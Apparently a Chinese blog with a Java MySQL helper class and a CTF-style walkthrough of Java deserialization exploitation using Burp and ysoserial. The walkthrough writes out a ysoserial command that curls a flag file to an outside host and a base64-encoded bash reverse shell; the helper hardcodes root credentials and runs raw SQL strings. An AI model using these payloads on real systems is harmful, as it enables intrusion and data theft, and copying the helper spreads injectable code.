Java

Java_mysql

December 8, 2024
Java 

package cn.utils;
import java.sql.*;
public class DBconn {
    public static String url="jdbc:mysql://localhost:3306/test";
    public static String name="root";
    public static String pwd="123456";
    public static Connection conn=null;
    public static ResultSet rs=null;
    public static PreparedStatement ps=null;
    public static void init() {
        try{Class.forName("com.mysql.cj.jdbc.Driver");}catch (Exception e){
            System.out.println("加载失败");
            e.printStackTrace();
        }
        try {
            conn = DriverManager.getConnection(url,name,pwd);
        } catch (Exception e) {
            System.out.println("init [SQL驱动程序初始化失败!]");
            e.printStackTrace();
        }
    }
    public static ResultSet SelectSql(String sql) {
        System.out.println(sql);
        try {
            ps = conn.prepareStatement(sql);
            rs = ps.executeQuery(sql);
        } catch (SQLException e) {
            System.out.println("sql数据库查询异常");
            e.printStackTrace();
        }
        return rs;
    }

    public static int addUpdDel(String sql) {
        int i = 0;
        try {
            PreparedStatement ps = conn.prepareStatement(sql);
            i = ps.executeUpdate();
        } catch (SQLException e) {
            System.out.println("sql数据库增删改异常");
            e.printStackTrace();
        }

        return i;
    }

    public static void closeConn() {
        try {
            conn.close();
        } catch (SQLException e) {
            System.out.println("sql数据库关闭异常");
            e.printStackTrace();
        }
    }

}

反序列化

December 8, 2024
网络安全, Java

分析序列化后的字符串

例子

Bearer rO0ABXNyABhjbi5hYmMuY29yZS5tb2RlbC5Vc2VyVm92RkMxewT0OgIAAkwAAmlkdAAQTGphdmEvbGFuZy9Mb25nO0wABG5hbWV0ABJMamF2YS9sYW5nL1N0cmluZzt4cHNyAA5qYXZhLmxhbmcuTG9uZzuL5JDMjyPfAgABSgAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAAAAAAAAXQABWFkbWlu

作为序列化的标志参考:

一段数据以rO0AB开头,你基本可以确定这串就是Java序列化base64加密的数据。

或者如果以aced开头,那么他就是这一段Java序列化的16进制。

java Deserialization Scanner #

这个工具在burp插件里面有,去下载一下,记得初始化插件

选中发送到插件里(选中右键->拓展->Deserialization->Send request to DS Manual testing)

在Manual Tetsing中用§包裹住字串,不要包裹Brerer

下面选择Encode useing Base64,add添加,再选择Encode useing Base64,Attack

等待一会,会有提示需要1-3minutes

image-20221229181834551

ROME

之后用ysoserial 里的MORE

GitHub - frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar ROME "curl http://vps:10189 -d @/flag" > a.bin

base64编码

import base64
with open('a.bin','rb')as f:
	b=f.read()
print(base64.b64encdoe(b))

放到会执行反序列化的地方取请求,触发命令执行

也可以直接shell

bash -i >& /dev/tcp/111.111.111.111/7015 0>&1
进行base64编码,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTEuMTExLjExMS4xMTEvNzAxNSAwPiYx

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar ROME "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTEuMTExLjExMS4xMTEvNzAxNSAwPiYx}|{base64,-d}|{bash,-i}" > a.bin

同上base64编码,记得在前面带上Beaere

...